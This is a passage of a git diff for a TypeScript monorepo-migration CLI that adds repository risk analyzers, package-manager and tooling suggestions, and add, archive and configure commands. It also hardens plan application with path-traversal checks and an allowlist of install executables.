to list files in ' + repo.name + ': ' + (err instanceof Error ? 
err.message : String(err))); + } + } + + // Case collision detection across all repos + const allFiles = new Map>(); + for (const repo of repoPaths) { + try { + const files = await listFiles(repo.path); + for (const file of files) { + const lower = file.toLowerCase(); + if (!allFiles.has(lower)) allFiles.set(lower, []); + allFiles.get(lower)!.push({ repo: repo.name, file }); + } + } catch (err) { + logger.debug?.('Failed to list files for case-collision check in ' + repo.name + ': ' + (err instanceof Error ? err.message : String(err))); + } + } + + for (const [, entries] of allFiles) { + const uniqueNames = [...new Set(entries.map((e) => e.file))]; + if (uniqueNames.length > 1) { + findings.push({ + id: `risk-case-collision-${uniqueNames[0]}`, + title: `Case collision: ${uniqueNames.join(' vs ')}`, + severity: 'error', + confidence: 'high', + evidence: entries.map((e) => ({ path: e.repo, snippet: e.file })), + suggestedAction: 'Rename one of the files to avoid case-insensitive filesystem conflicts', + }); + } + } + + logger.debug(`Repo risks analysis: ${findings.length} findings`); + return findings; +} diff --git a/src/analyzers/risk-summary.ts b/src/analyzers/risk-summary.ts new file mode 100755 index 0000000..49d0ece --- /dev/null +++ b/src/analyzers/risk-summary.ts @@ -0,0 +1,68 @@ +import type { AnalysisFinding, RiskClassification, RiskSummary } from '../types/index.js'; + +/** + * Classify migration risk from all findings. 
+ */ +export function classifyRisk(allFindings: AnalysisFinding[]): RiskSummary { + const reasons: string[] = []; + let classification: RiskClassification = 'straightforward'; + + const criticalCount = allFindings.filter((f) => f.severity === 'critical').length; + const errorCount = allFindings.filter((f) => f.severity === 'error').length; + const warnCount = allFindings.filter((f) => f.severity === 'warn').length; + + if (criticalCount > 0) { + classification = 'complex'; + reasons.push(`${criticalCount} critical issue(s) require resolution`); + } + + if (errorCount > 0) { + classification = classification === 'complex' ? 'complex' : 'needs-decisions'; + reasons.push(`${errorCount} error-level finding(s) need attention`); + } + + if (warnCount > 3) { + if (classification === 'straightforward') classification = 'needs-decisions'; + reasons.push(`${warnCount} warnings detected`); + } + + // Check for specific risk patterns + const hasSubmodules = allFindings.some((f) => f.id.startsWith('risk-submodules')); + const hasLFS = allFindings.some((f) => f.id.startsWith('risk-lfs')); + const hasMultipleCI = allFindings.some((f) => f.id === 'ci-multiple-systems'); + const hasNodeMismatch = allFindings.some((f) => f.id === 'env-node-mismatch'); + const hasCaseCollision = allFindings.some((f) => f.id.startsWith('risk-case-collision')); + + if (hasSubmodules) { + classification = 'complex'; + reasons.push('Git submodules require manual resolution'); + } + if (hasLFS) { + if (classification === 'straightforward') classification = 'needs-decisions'; + reasons.push('Git LFS requires configuration'); + } + if (hasMultipleCI) { + if (classification === 'straightforward') classification = 'needs-decisions'; + reasons.push('Multiple CI systems need consolidation'); + } + if (hasNodeMismatch) { + reasons.push('Node.js versions are inconsistent'); + } + if (hasCaseCollision) { + classification = 'complex'; + reasons.push('File case collisions must be resolved'); + } + + if 
(reasons.length === 0) { + reasons.push('No significant risks detected'); + } + + // Get top findings (most severe first) + const severityOrder: Record = { critical: 0, error: 1, warn: 2, info: 3 }; + const sorted = [...allFindings].sort( + (a, b) => (severityOrder[a.severity] ?? 4) - (severityOrder[b.severity] ?? 4), + ); + const topFindings = sorted.slice(0, 5); + + return { classification, reasons, topFindings }; +} diff --git a/src/analyzers/suggestions.ts b/src/analyzers/suggestions.ts new file mode 100755 index 0000000..3b49ac3 --- /dev/null +++ b/src/analyzers/suggestions.ts @@ -0,0 +1,217 @@ +import type { SuggestedDecision, DependencyConflict } from '../types/index.js'; +import { pathExists, readJson } from '../utils/fs.js'; +import path from 'node:path'; + +function getErrorMessage(error: unknown): string { + return error instanceof Error ? error.message : String(error); +} + +/** + * Suggest package manager based on lockfile presence and packageManager fields. + */ +export async function suggestPackageManager( + repoPaths: Array<{ path: string; name: string }> +): Promise { + const counts: Record = { pnpm: 0, yarn: 0, npm: 0 }; + const evidence: string[] = []; + + for (const repo of repoPaths) { + // Check for lockfiles + if (await pathExists(path.join(repo.path, 'pnpm-lock.yaml'))) { + counts.pnpm++; + evidence.push(`${repo.name} has pnpm-lock.yaml`); + } + if (await pathExists(path.join(repo.path, 'yarn.lock'))) { + counts.yarn++; + evidence.push(`${repo.name} has yarn.lock`); + } + if (await pathExists(path.join(repo.path, 'package-lock.json'))) { + counts.npm++; + evidence.push(`${repo.name} has package-lock.json`); + } + + // Check for packageManager field in package.json + const pkgJsonPath = path.join(repo.path, 'package.json'); + if (await pathExists(pkgJsonPath)) { + try { + const pkg = await readJson>(pkgJsonPath); + if (typeof pkg.packageManager === 'string') { + const pmField = pkg.packageManager as string; + if (pmField.startsWith('pnpm')) { 
+ counts.pnpm++; + evidence.push(`${repo.name} has packageManager field: ${pmField}`); + } else if (pmField.startsWith('yarn')) { + counts.yarn++; + evidence.push(`${repo.name} has packageManager field: ${pmField}`); + } else if (pmField.startsWith('npm')) { + counts.npm++; + evidence.push(`${repo.name} has packageManager field: ${pmField}`); + } + } + } catch (error) { + evidence.push( + `Could not parse package.json in ${repo.name}: ${getErrorMessage(error)}` + ); + } + } + } + + // Determine winner by majority vote, prefer pnpm if tied + const sorted = Object.entries(counts).sort((a, b) => b[1] - a[1]); + const topCount = sorted[0][1]; + + let suggestion: string; + if (topCount === 0) { + // No signals found, default to pnpm + suggestion = 'pnpm'; + evidence.push('No lockfiles or packageManager fields found, defaulting to pnpm'); + } else { + // Check for ties at the top + const tied = sorted.filter(([, count]) => count === topCount); + if (tied.length > 1 && tied.some(([pm]) => pm === 'pnpm')) { + suggestion = 'pnpm'; + evidence.push('Tied between package managers, preferring pnpm'); + } else { + suggestion = sorted[0][0]; + } + } + + // Determine confidence + const total = counts.pnpm + counts.yarn + counts.npm; + let confidence: 'high' | 'medium' | 'low'; + if (total === 0) { + confidence = 'low'; + } else if (counts[suggestion] === total) { + confidence = 'high'; + } else if (counts[suggestion] > total / 2) { + confidence = 'medium'; + } else { + confidence = 'low'; + } + + const alternatives = ['pnpm', 'yarn', 'npm'].filter((pm) => pm !== suggestion); + + return { + topic: 'package-manager', + suggestion, + confidence, + evidence, + alternatives, + }; +} + +/** + * Suggest workspace tool (turbo, nx, or none). 
+ */ +export async function suggestWorkspaceTool( + repoPaths: Array<{ path: string; name: string }> +): Promise { + const evidence: string[] = []; + let turboCount = 0; + let nxCount = 0; + + for (const repo of repoPaths) { + if (await pathExists(path.join(repo.path, 'turbo.json'))) { + turboCount++; + evidence.push(`${repo.name} has turbo.json`); + } + if (await pathExists(path.join(repo.path, 'nx.json'))) { + nxCount++; + evidence.push(`${repo.name} has nx.json`); + } + } + + let suggestion: string; + let confidence: 'high' | 'medium' | 'low'; + + if (turboCount > 0 && nxCount > 0) { + // Both found - prefer whichever has more, turbo wins ties + suggestion = turboCount >= nxCount ? 'turbo' : 'nx'; + confidence = 'low'; + evidence.push('Both turbo and nx configs found across repos'); + } else if (turboCount > 0) { + suggestion = 'turbo'; + confidence = turboCount === repoPaths.length ? 'high' : 'medium'; + } else if (nxCount > 0) { + suggestion = 'nx'; + confidence = nxCount === repoPaths.length ? 'high' : 'medium'; + } else { + suggestion = 'none'; + confidence = 'medium'; + evidence.push('No workspace tool configs found in any repo'); + } + + const alternatives = ['turbo', 'nx', 'none'].filter((t) => t !== suggestion); + + return { + topic: 'workspace-tool', + suggestion, + confidence, + evidence, + alternatives, + }; +} + +/** + * Suggest dependency resolution strategy based on conflict analysis. 
+ */ +export function suggestDependencyStrategy( + conflicts: DependencyConflict[] +): SuggestedDecision { + const evidence: string[] = []; + + if (conflicts.length === 0) { + return { + topic: 'dependency-strategy', + suggestion: 'hoist', + confidence: 'high', + evidence: ['No dependency conflicts detected'], + alternatives: ['isolate', 'hoist-with-overrides'], + }; + } + + const incompatibleCount = conflicts.filter((c) => c.severity === 'incompatible').length; + const majorCount = conflicts.filter((c) => c.severity === 'major').length; + const minorCount = conflicts.filter((c) => c.severity === 'minor').length; + + evidence.push( + `Found ${conflicts.length} conflicts: ${incompatibleCount} incompatible, ${majorCount} major, ${minorCount} minor` + ); + + let suggestion: string; + let confidence: 'high' | 'medium' | 'low'; + + if (incompatibleCount > conflicts.length / 2) { + // Many incompatible conflicts - isolate packages + suggestion = 'isolate'; + confidence = 'high'; + evidence.push('Majority of conflicts are incompatible, isolation recommended'); + } else if (incompatibleCount === 0 && majorCount === 0) { + // Only minor conflicts - safe to hoist + suggestion = 'hoist'; + confidence = 'high'; + evidence.push('All conflicts are minor, hoisting is safe'); + } else if (incompatibleCount > 0) { + // Mixed with some incompatible - use overrides + suggestion = 'hoist-with-overrides'; + confidence = 'medium'; + evidence.push('Mix of conflict severities, overrides can resolve most issues'); + } else { + // Only major conflicts + suggestion = 'hoist-with-overrides'; + confidence = 'medium'; + evidence.push('Major conflicts can be resolved with version overrides'); + } + + const alternatives = ['hoist', 'isolate', 'hoist-with-overrides'].filter( + (s) => s !== suggestion + ); + + return { + topic: 'dependency-strategy', + suggestion, + confidence, + evidence, + alternatives, + }; +} diff --git a/src/analyzers/tooling.ts b/src/analyzers/tooling.ts new file mode 100755 
index 0000000..73d3f69 --- /dev/null +++ b/src/analyzers/tooling.ts @@ -0,0 +1,130 @@ +import path from 'node:path'; +import type { AnalysisFinding, Logger } from '../types/index.js'; +import { pathExists, readJson } from '../utils/fs.js'; + +function getErrorMessage(error: unknown): string { + return error instanceof Error ? error.message : String(error); +} + +const TOOL_CONFIGS: Array<{ + name: string; + category: string; + files: string[]; +}> = [ + { name: 'TypeScript', category: 'typescript', files: ['tsconfig.json', 'tsconfig.build.json'] }, + { + name: 'ESLint', + category: 'lint', + files: ['.eslintrc.json', '.eslintrc.yml', '.eslintrc.yaml', '.eslintrc.js', '.eslintrc.cjs', 'eslint.config.js', 'eslint.config.mjs'], + }, + { + name: 'Prettier', + category: 'format', + files: ['.prettierrc', '.prettierrc.json', '.prettierrc.yaml', '.prettierrc.yml', '.prettierrc.js', '.prettierrc.cjs', 'prettier.config.js'], + }, + { + name: 'Jest', + category: 'test', + files: ['jest.config.js', 'jest.config.ts', 'jest.config.cjs', 'jest.config.mjs'], + }, + { + name: 'Vitest', + category: 'test', + files: ['vitest.config.ts', 'vitest.config.js', 'vitest.config.mts'], + }, +]; + +/** + * Analyze development tooling across repositories. + * Detects TypeScript, lint, format, and test configurations. 
+ */ +export async function analyzeTooling( + repoPaths: Array<{ path: string; name: string }>, + logger: Logger, +): Promise { + const findings: AnalysisFinding[] = []; + const toolPresence: Record> = {}; + + for (const repo of repoPaths) { + for (const tool of TOOL_CONFIGS) { + for (const file of tool.files) { + const filePath = path.join(repo.path, file); + if (await pathExists(filePath)) { + const key = tool.name; + if (!toolPresence[key]) toolPresence[key] = []; + toolPresence[key].push({ repo: repo.name, file }); + } + } + } + + // Check for test framework in package.json + const pkgPath = path.join(repo.path, 'package.json'); + if (await pathExists(pkgPath)) { + try { + const pkg = (await readJson(pkgPath)) as Record; + const scripts = (pkg.scripts as Record) || {}; + if (scripts.test && !scripts.test.includes('echo')) { + // Has a real test script + } else if (!scripts.test) { + findings.push({ + id: `tooling-no-test-${repo.name}`, + title: `No test script in ${repo.name}`, + severity: 'info', + confidence: 'high', + evidence: [{ path: pkgPath, snippet: 'scripts.test is missing' }], + suggestedAction: 'Add a test script to package.json', + }); + } + } catch (error) { + findings.push({ + id: `tooling-malformed-package-json-${repo.name}`, + title: `Malformed package.json in ${repo.name}`, + severity: 'warn', + confidence: 'high', + evidence: [{ path: pkgPath, snippet: getErrorMessage(error) }], + suggestedAction: 'Fix package.json syntax to analyze tooling scripts safely.', + }); + } + } + } + + // Flag inconsistencies + for (const [tool, repos] of Object.entries(toolPresence)) { + // Check if some repos use it and some don't + const repoNames = new Set(repos.map((r) => r.repo)); + const allRepoNames = repoPaths.map((r) => r.name); + const missing = allRepoNames.filter((r) => !repoNames.has(r)); + + if (missing.length > 0 && repoNames.size > 0) { + findings.push({ + id: `tooling-inconsistent-${tool.toLowerCase()}`, + title: `${tool} not used consistently 
across repos`, + severity: 'info', + confidence: 'medium', + evidence: [ + ...repos.map((r) => ({ path: r.repo, snippet: `has ${r.file}` })), + ...missing.map((r) => ({ path: r, snippet: `missing ${tool} config` })), + ], + suggestedAction: `Consider standardizing ${tool} configuration across all packages`, + }); + } + + // Check for JS configs that can't be safely merged + const jsConfigs = repos.filter( + (r) => r.file.endsWith('.js') || r.file.endsWith('.cjs') || r.file.endsWith('.mjs'), + ); + if (jsConfigs.length > 0) { + findings.push({ + id: `tooling-executable-config-${tool.toLowerCase()}`, + title: `${tool} uses executable config files`, + severity: 'warn', + confidence: 'high', + evidence: jsConfigs.map((r) => ({ path: path.join(r.repo, r.file) })), + suggestedAction: `Executable ${tool} configs cannot be safely auto-merged. Manual review required.`, + }); + } + } + + logger.debug(`Tooling analysis: ${findings.length} findings`); + return findings; +} diff --git a/src/commands/add.ts b/src/commands/add.ts new file mode 100755 index 0000000..9a0a059 --- /dev/null +++ b/src/commands/add.ts @@ -0,0 +1,91 @@ +import path from 'node:path'; +import { createLogger } from '../utils/logger.js'; +import { writeJson } from '../utils/fs.js'; +import { parseConflictStrategy } from '../utils/cli-options.js'; +import { tryParsePackageManagerType } from '../strategies/package-manager.js'; +import { generateAddPlan, applyAddPlan } from '../strategies/add.js'; +import type { AddCommandOptions } from '../types/index.js'; + +interface CLIAddOptions { + to: string; + packagesDir: string; + out?: string; + apply?: boolean; + conflictStrategy: string; + verbose?: boolean; + packageManager: string; +} + +export async function addCommand(repo: string, options: CLIAddOptions): Promise { + const logger = createLogger(options.verbose); + const conflictStrategy = parseConflictStrategy(options.conflictStrategy); + const packageManager = 
tryParsePackageManagerType(options.packageManager); + + if (!conflictStrategy) { + logger.error( + `Invalid conflict strategy: ${options.conflictStrategy}. Valid options: highest, lowest, prompt` + ); + process.exitCode = 1; + return; + } + + if (!packageManager) { + logger.error( + `Invalid package manager: ${options.packageManager}. Valid options: pnpm, yarn, yarn-berry, npm` + ); + process.exitCode = 1; + return; + } + + const cmdOptions: AddCommandOptions = { + to: path.resolve(options.to), + packagesDir: options.packagesDir, + out: options.out, + apply: options.apply, + conflictStrategy, + verbose: options.verbose, + packageManager, + }; + + try { + logger.info('Generating add plan...'); + const plan = await generateAddPlan(repo, cmdOptions, logger); + + // Write plan to file + const planPath = options.out || `add-plan-${plan.sourceRepo.name}.json`; + const absPath = path.resolve(planPath); + await writeJson(absPath, plan); + logger.success(`Plan written to ${absPath}`); + + // Print summary + logger.info(`\nAdd Plan Summary:`); + logger.info(` Source: ${plan.sourceRepo.original}`); + logger.info(` Target: ${plan.targetMonorepo}`); + logger.info(` Packages dir: ${plan.packagesDir}`); + logger.info(` Conflicts: ${plan.analysis.conflicts.length}`); + logger.info(` Operations: ${plan.operations.length}`); + logger.info(` Complexity: ${plan.analysis.complexityScore}/100`); + + if (plan.decisions.length > 0) { + logger.info(`\nDecisions:`); + for (const d of plan.decisions) { + logger.info(` ${d.id}: ${d.chosen} (alternatives: ${d.alternatives.join(', ') || 'none'})`); + } + } + + // Apply if requested + if (options.apply) { + logger.info('\nApplying plan...'); + const result = await applyAddPlan(plan, logger); + if (result.success) { + logger.success(`Package added at ${result.packageDir}`); + } + } else { + logger.info(`\nTo apply: monorepo apply --plan ${planPath} --out ${cmdOptions.to}`); + } + } catch (err: unknown) { + const msg = err instanceof Error ? 
err.message : String(err); + logger.error(`Add failed: ${msg}`); + process.exitCode = 1; + } +} diff --git a/src/commands/analyze.ts b/src/commands/analyze.ts index a4f1119..92ef253 100755 --- a/src/commands/analyze.ts +++ b/src/commands/analyze.ts @@ -4,15 +4,23 @@ import type { CircularDependency, CrossDependency, DependencyConflict, + ExtendedAnalysis, FileCollision, PackageInfo, } from '../types/index.js'; import { createLogger, formatHeader, formatList } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; import { createTempDir, removeDir } from '../utils/fs.js'; import { validateRepoSources } from '../utils/validation.js'; import { analyzeDependencies } from '../analyzers/dependencies.js'; import { detectFileCollisions } from '../analyzers/files.js'; import { detectCircularDependencies, computeHotspots } from '../analyzers/graph.js'; +import { analyzeEnvironment } from '../analyzers/environment.js'; +import { analyzeTooling } from '../analyzers/tooling.js'; +import { analyzeCI } from '../analyzers/ci.js'; +import { analyzePublishing } from '../analyzers/publishing.js'; +import { analyzeRepoRisks } from '../analyzers/repo-risks.js'; +import { classifyRisk } from '../analyzers/risk-summary.js'; import { cloneOrCopyRepos } from '../strategies/copy.js'; import { getConflictSummary } from '../resolvers/dependencies.js'; @@ -365,6 +373,50 @@ function printAnalysisReport(result: AnalyzeResult, verbose: boolean): void { : 'High'; logger.log(` ${scoreColor(`${result.complexityScore}/100`)} (${scoreLabel})`); + // Extended Analysis + if (result.extendedAnalysis) { + const ext = result.extendedAnalysis; + const sections = [ + { label: 'Environment', findings: ext.environment }, + { label: 'Tooling', findings: ext.tooling }, + { label: 'CI/CD', findings: ext.ci }, + { label: 'Publishing', findings: ext.publishing }, + { label: 'Repo Risks', findings: ext.repoRisks }, + ]; + + for (const section of sections) { + if (section.findings.length > 0) 
{ + logger.log(chalk.bold(`\n${section.label}:`)); + for (const f of section.findings) { + const color = f.severity === 'error' || f.severity === 'critical' + ? chalk.red + : f.severity === 'warn' + ? chalk.yellow + : chalk.gray; + logger.log(` ${color('•')} ${f.title}`); + if (verbose && f.suggestedAction) { + logger.log(` ${chalk.cyan('→')} ${f.suggestedAction}`); + } + } + } + } + + // Risk summary + const risk = ext.riskSummary; + const riskColor = risk.classification === 'complex' + ? chalk.red + : risk.classification === 'needs-decisions' + ? chalk.yellow + : chalk.green; + logger.log(chalk.bold('\nRisk classification:')); + logger.log(` ${riskColor(risk.classification)}`); + if (risk.reasons.length > 0 && verbose) { + for (const reason of risk.reasons) { + logger.log(` ${chalk.gray('•')} ${reason}`); + } + } + } + // Recommendations if (result.recommendations.length > 0) { logger.log(chalk.bold('\nRecommendations:')); @@ -408,7 +460,7 @@ export async function analyzeCommand( logger.error(error); } } - process.exit(1); + throw new CliExitError(); } if (!options.json) { @@ -461,6 +513,36 @@ export async function analyzeCommand( // Step 6c: Compute hotspots const hotspots = computeHotspots(depAnalysis.packages, depAnalysis.conflicts); + // Step 6d: Extended analysis + if (!options.json) { + logger.info('Running extended analysis...'); + } + + const analysisLogger = options.json ? 
silentLogger : logger; + const [envFindings, toolingFindings, ciFindings, publishFindings, riskFindings] = + await Promise.all([ + analyzeEnvironment(repoPaths, analysisLogger), + analyzeTooling(repoPaths, analysisLogger), + analyzeCI(repoPaths, analysisLogger), + analyzePublishing(repoPaths, analysisLogger), + analyzeRepoRisks(repoPaths, analysisLogger), + ]); + + const allExtendedFindings = [ + ...envFindings, ...toolingFindings, ...ciFindings, + ...publishFindings, ...riskFindings, + ]; + + const extendedAnalysis: ExtendedAnalysis = { + environment: envFindings, + packageManager: [], // already covered by main dep analysis + tooling: toolingFindings, + ci: ciFindings, + publishing: publishFindings, + repoRisks: riskFindings, + riskSummary: classifyRisk(allExtendedFindings), + }; + // Extract peer conflicts for scoring const peerConflicts = depAnalysis.findings?.peerConflicts ?? []; @@ -495,6 +577,7 @@ export async function analyzeCommand( circularDependencies: circularDependencies.length > 0 ? circularDependencies : undefined, hotspots: hotspots.length > 0 ? hotspots : undefined, findings: depAnalysis.findings, + extendedAnalysis, }; // Output @@ -520,11 +603,13 @@ export async function analyzeCommand( if (tempDir) { try { await removeDir(tempDir); - } catch { - // Ignore cleanup errors + } catch (cleanupError) { + const cleanupMessage = + cleanupError instanceof Error ? 
cleanupError.message : String(cleanupError); + logger.debug(`Failed to clean temporary directory ${tempDir}: ${cleanupMessage}`); } } - process.exit(1); + throw new CliExitError(); } } diff --git a/src/commands/apply.ts b/src/commands/apply.ts index 84eb1ec..cd642f4 100755 --- a/src/commands/apply.ts +++ b/src/commands/apply.ts @@ -10,6 +10,7 @@ import type { Logger, } from '../types/index.js'; import { createLogger } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; import { ensureDir, move, @@ -28,6 +29,38 @@ import { computePlanHash, } from '../utils/operation-log.js'; +/** + * Assert that a path, when resolved relative to a base directory, + * stays within that base directory. Prevents path traversal attacks. + */ +function assertPathContained(base: string, relativePath: string): void { + const resolved = path.resolve(base, relativePath); + const normalizedBase = path.resolve(base) + path.sep; + if (!resolved.startsWith(normalizedBase) && resolved !== path.resolve(base)) { + throw new Error(`Path traversal detected: "${relativePath}" escapes base directory`); + } +} + +const ALLOWED_INSTALL_EXECUTABLES = new Set(['pnpm', 'npm', 'yarn', 'bun', 'npx']); + +/** + * Validate and parse an install command, ensuring only approved executables are used. + */ +function validateInstallCommand(cmd: string): { exe: string; args: string[] } { + const parts = cmd.split(/\s+/).filter(Boolean); + if (parts.length === 0) { + throw new Error('Install command is empty'); + } + const exe = parts[0]; + if (!ALLOWED_INSTALL_EXECUTABLES.has(exe)) { + throw new Error( + `Install command executable "${exe}" is not allowed. 
` + + `Allowed executables: ${[...ALLOWED_INSTALL_EXECUTABLES].join(', ')}` + ); + } + return { exe, args: parts.slice(1) }; +} + /** * CLI options passed from commander */ @@ -49,6 +82,7 @@ export function validatePlan(data: unknown): data is ApplyPlan { if (plan.version !== 1) return false; if (!Array.isArray(plan.sources) || plan.sources.length === 0) return false; if (typeof plan.packagesDir !== 'string') return false; + if (plan.packagesDir.includes('..') || path.isAbsolute(plan.packagesDir)) return false; if (typeof plan.rootPackageJson !== 'object' || plan.rootPackageJson === null) return false; if (!Array.isArray(plan.files)) return false; if (typeof plan.install !== 'boolean') return false; @@ -61,6 +95,8 @@ export function validatePlan(data: unknown): data is ApplyPlan { if (typeof file !== 'object' || file === null) return false; const f = file as Record; if (typeof f.relativePath !== 'string' || typeof f.content !== 'string') return false; + // Reject path traversal attempts + if (f.relativePath.includes('..') || path.isAbsolute(f.relativePath as string)) return false; } return true; } @@ -162,7 +198,7 @@ export async function applyCommand(options: CLIApplyOptions): Promise { const planPath = path.resolve(options.plan); if (!(await pathExists(planPath))) { logger.error(`Plan file not found: ${planPath}`); - process.exit(1); + throw new CliExitError(); } const planContent = await readFile(planPath); @@ -173,14 +209,12 @@ export async function applyCommand(options: CLIApplyOptions): Promise { plan = JSON.parse(planContent); } catch { logger.error('Plan file contains invalid JSON.'); - process.exit(1); - return; // unreachable, satisfies TS + throw new CliExitError(); } if (!validatePlan(plan)) { logger.error('Plan file is invalid. 
Check version, sources, packagesDir, rootPackageJson, files, and install fields.'); - process.exit(1); - return; + throw new CliExitError(); } // --dry-run: print steps and exit @@ -213,13 +247,11 @@ export async function applyCommand(options: CLIApplyOptions): Promise { const stagingDirs = await findStagingDirs(outputDir); if (stagingDirs.length === 0) { logger.error('No staging directory found to resume. Run without --resume to start fresh.'); - process.exit(1); - return; + throw new CliExitError(); } if (stagingDirs.length > 1) { logger.error(`Multiple staging directories found. Run with --cleanup first.`); - process.exit(1); - return; + throw new CliExitError(); } stagingDir = stagingDirs[0]; logPath = getLogPath(stagingDir); @@ -229,8 +261,7 @@ export async function applyCommand(options: CLIApplyOptions): Promise { const headerEntry = logEntries.find((e) => e.id === 'header'); if (headerEntry?.planHash && headerEntry.planHash !== planHash) { logger.error('Plan file has changed since the staging directory was created. Use --cleanup first.'); - process.exit(1); - return; + throw new CliExitError(); } const completedSteps = logEntries.filter((e) => e.status === 'completed').length; @@ -250,7 +281,7 @@ export async function applyCommand(options: CLIApplyOptions): Promise { if (!(await pathExists(source.path))) { logger.error(`Source path not found: ${source.path} (for package "${source.name}")`); logger.info('Source repos may have been cleaned up. 
Regenerate the plan file.'); - process.exit(1); + throw new CliExitError(); } } } @@ -280,6 +311,7 @@ export async function applyCommand(options: CLIApplyOptions): Promise { const outputs: string[] = []; for (const source of plan.sources) { if (signal.aborted) break; + assertPathContained(stagingDir, path.join(plan.packagesDir, source.name)); const targetPath = path.join(stagingDir, plan.packagesDir, source.name); if (await pathExists(targetPath)) { logger.debug(`Package "${source.name}" already in staging, skipping`); @@ -309,6 +341,7 @@ export async function applyCommand(options: CLIApplyOptions): Promise { const outputs: string[] = []; for (const file of plan.files) { if (signal.aborted) break; + assertPathContained(stagingDir, file.relativePath); const filePath = path.join(stagingDir, file.relativePath); await ensureDir(path.dirname(filePath)); await writeFile(filePath, file.content); @@ -325,8 +358,8 @@ export async function applyCommand(options: CLIApplyOptions): Promise { if (plan.install) { const installOk = await executeStep('install', logPath, logEntries, signal, logger, async () => { const cmd = plan.installCommand || 'pnpm install --ignore-scripts'; - logger.info(`Installing dependencies: ${cmd}`); - const [exe, ...args] = cmd.split(' '); + const { exe, args } = validateInstallCommand(cmd); + logger.info(`Installing dependencies: ${exe} ${args.join(' ')}`); execFileSync(exe, args, { cwd: stagingDir, stdio: options.verbose ? 
'inherit' : 'pipe', diff --git a/src/commands/archive.ts b/src/commands/archive.ts new file mode 100755 index 0000000..3e7d007 --- /dev/null +++ b/src/commands/archive.ts @@ -0,0 +1,77 @@ +import path from 'node:path'; +import { createLogger } from '../utils/logger.js'; +import { writeJson } from '../utils/fs.js'; +import { generateArchivePlan, applyArchiveViaGitHubApi } from '../strategies/archive.js'; + +interface CLIArchiveOptions { + monorepoUrl: string; + out?: string; + apply?: boolean; + tokenFromEnv?: boolean; + verbose?: boolean; +} + +export async function archiveCommand(repos: string[], options: CLIArchiveOptions): Promise { + const logger = createLogger(options.verbose); + + try { + logger.info(`Generating archive plan for ${repos.length} repositories...`); + + const plan = await generateArchivePlan(repos, options.monorepoUrl, { + tokenFromEnv: options.tokenFromEnv, + }); + + // Write plan to file + const planPath = options.out || 'archive.plan.json'; + const absPath = path.resolve(planPath); + await writeJson(absPath, plan); + logger.success(`Archive plan written to ${absPath}`); + + // Print summary + logger.info(`\nArchive Plan Summary:`); + logger.info(` Repositories: ${plan.repos.length}`); + logger.info(` Monorepo URL: ${plan.monorepoUrl}`); + for (const repo of plan.repos) { + logger.info(` - ${repo.name} (${repo.url})`); + } + + // Show README patches + logger.info(`\nREADME deprecation patches generated for ${plan.repos.length} repos.`); + logger.info('These patches can be applied without a GitHub token.'); + + if (plan.apiOperations?.length) { + logger.info(`\nAPI operations (require GITHUB_TOKEN):`); + for (const op of plan.apiOperations) { + logger.info(` - ${op.action}: ${op.repo}`); + } + } + + // Apply if requested + if (options.apply) { + if (!plan.apiOperations?.length) { + logger.warn('No API operations to apply. 
Use --token-from-env to include archive operations.'); + return; + } + + logger.info('\nApplying archive operations via GitHub API...'); + const result = await applyArchiveViaGitHubApi(plan, logger); + + if (result.applied.length > 0) { + logger.success(`Archived ${result.applied.length} repositories`); + } + if (result.failed.length > 0) { + logger.error(`Failed to archive ${result.failed.length} repositories:`); + for (const f of result.failed) { + logger.error(` ${f.repo}: ${f.error}`); + } + process.exitCode = 1; + } + } else { + logger.info(`\nTo apply: monorepo archive ${repos.join(' ')} --monorepo-url ${options.monorepoUrl} --apply --token-from-env`); + } + } catch (err: unknown) { + const msg = err instanceof Error ? err.message : String(err); + logger.error(`Archive failed: ${msg}`); + process.exitCode = 1; + } +} diff --git a/src/commands/configure.ts b/src/commands/configure.ts new file mode 100755 index 0000000..f632d23 --- /dev/null +++ b/src/commands/configure.ts @@ -0,0 +1,104 @@ +import path from 'node:path'; +import chalk from 'chalk'; +import type { Command } from 'commander'; +import { createLogger, formatHeader } from '../utils/logger.js'; +import { pathExists, writeJson } from '../utils/fs.js'; +import { generateConfigPlan, applyConfigPlan } from '../strategies/configure.js'; +import { CliExitError } from '../utils/errors.js'; + +interface CLIConfigureOptions { + apply?: boolean; + out?: string; + packagesDir: string; + verbose?: boolean; +} + +async function configureCommand(monorepoDir: string, options: CLIConfigureOptions): Promise { + const logger = createLogger(options.verbose); + const resolvedDir = path.resolve(monorepoDir); + + logger.log(formatHeader('Configure')); + + // Validate the monorepo directory exists + if (!(await pathExists(resolvedDir))) { + logger.error(`Monorepo directory not found: ${resolvedDir}`); + throw new CliExitError(); + } + + // Discover packages in the packages directory + const pkgsDirPath = 
path.join(resolvedDir, options.packagesDir); + let packageNames: string[] = []; + + if (await pathExists(pkgsDirPath)) { + const { default: fs } = await import('fs-extra'); + const entries = await fs.readdir(pkgsDirPath, { withFileTypes: true }); + packageNames = entries + .filter((e) => e.isDirectory()) + .map((e) => e.name); + } + + logger.info(`Found ${packageNames.length} package(s) in ${options.packagesDir}/`); + + // Generate the ConfigPlan + const plan = await generateConfigPlan( + resolvedDir, + packageNames, + options.packagesDir, + {}, + logger, + ); + + // Display patches + if (plan.patches.length > 0) { + logger.log(''); + logger.log(chalk.cyan.bold('Patches:')); + for (const patch of plan.patches) { + const label = patch.before ? 'UPDATE' : 'CREATE'; + logger.log(` [${label}] ${patch.path} — ${patch.description}`); + } + } else { + logger.log(''); + logger.success('No config patches needed — everything is already configured.'); + } + + // Display warnings + if (plan.warnings.length > 0) { + logger.log(''); + logger.log(chalk.yellow.bold('Warnings:')); + for (const warning of plan.warnings) { + logger.warn(` ${warning.config}: ${warning.reason}`); + logger.log(` Suggestion: ${warning.suggestion}`); + } + } + + // Optionally write plan JSON to file + if (options.out) { + const outPath = path.resolve(options.out); + await writeJson(outPath, plan, { spaces: 2 }); + logger.log(''); + logger.success(`Plan written to ${outPath}`); + } + + // Optionally apply + if (options.apply) { + logger.log(''); + logger.info('Applying config plan...'); + await applyConfigPlan(plan, resolvedDir, logger); + logger.success('Config plan applied successfully.'); + } else if (!options.out && plan.patches.length > 0) { + logger.log(''); + logger.log('Run with --apply to write these files, or --out to save the plan as JSON.'); + } +} + +export function registerConfigureCommand(program: Command): void { + program + .command('configure') + .description('Scaffold shared configs 
